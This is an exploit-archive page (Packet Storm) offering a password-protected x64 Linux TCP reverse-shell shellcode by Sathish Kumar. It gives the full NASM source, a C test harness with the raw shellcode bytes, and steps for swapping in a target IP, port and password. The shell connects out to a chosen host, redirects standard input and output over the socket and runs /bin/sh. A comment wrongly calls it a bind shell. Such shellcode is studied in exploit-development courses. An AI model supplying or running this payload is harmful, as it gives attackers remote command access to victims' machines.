exploit the possibilities

TCP Reverse Shell Shellcode

TCP Reverse Shell Shellcode
Posted Jan 6, 2016
Authored by Sathish Kumar

151 bytes small TCP reverse shell with password prompt shellcode.

tags | shell, tcp, shellcode
MD5 | 5a835776fd58339b3d3ea541293e73dc

TCP Reverse Shell Shellcode

Change Mirror Download
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: tcp reverse shell with password prompt in 151 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
* Copyright: (c) 2016 iQube. (http://iQube.io)
* Release Date: January 6, 2016
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
* nc localhost 4444
*
*/

/*
* NOTE: This C code binds on port 4444
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
* port.py
* import socket
* port = 4444
* hex(socket.htons(port))
* python port.py
* Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* nasm -felf64 filename.nasm -o filename.o
* ld filename.o -o filename
* To inspect for nulls
* objdump -M intel -D filename.o


global _start

_start:
jmp sock
prompt: db 'Passcode' ; initilization of prompt data
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41

sock:
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall

; copying the socket descripter from rax to rdi register so that we can use it further

xchg rax, rdi

; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure

xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
not ebx
mov dword [rsp-4], ebx
sub rsp , 4 ; adjust the stack
push word 0x5c11 ; port 4444 in network byte order
push word 0x02 ; AF_INET
push rsp
pop rsi

; connecting to the remote ip
push 0x2a
pop rax
push 0x10
pop rdx
syscall


; initilization of dup2
push 0x3
pop rsi ; setting argument to 3



duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate

xor rax, rax
inc al ; rax register to value 1 syscall for write
push rax
pop rdi ; rdi register to value 1
lea rsi, [rel prompt]
xor rdx, rdx ; xor the rdx register to clear the previous values
push 0xe
pop rdx
syscall

; checking the password using read
password_check:

push rsp
pop rsi
xor rax, rax ; system read syscall value is 0 so rax is set to 0
syscall
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
pop rax
lea rdi, [rel rsi]
scasd ; comparing the user input and stored password in the stack
jne Exit




execve: ; Execve format , execve("/bin/sh", 0 , 0)
xor rsi , rsi
mul rsi ; zeroed rax , rdx register
push ax ; terminate string with null
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
push rbx
push rsp
pop rdi ; set RDI
push byte 0x3b ; execve syscall number (59)
pop rax
syscall

Exit:

;Exit shellcode if password is wrong
push 0x3c
pop rax ;syscall number for exit is 60
xor rdi, rdi
syscall
*/


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
//ip address which can be obtained by
/* example 10.1.75.202
* hex value equivalent = 0a.01.4b.ca
*/
//replace this with the ip address of the system to which the shell should connect
"\x0a\x01\x4b\xca"
"\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
//Password this can be obtained by
/*
* python
* password = 'hack'
* (password[::-1]).encode('hex')
* Reuslt : 6b636168
* This is stored in reverse beacuse of stack
*
*
*/
"\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";

main()
{

printf("Shellcode Length: %d\n", (int)strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    11 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close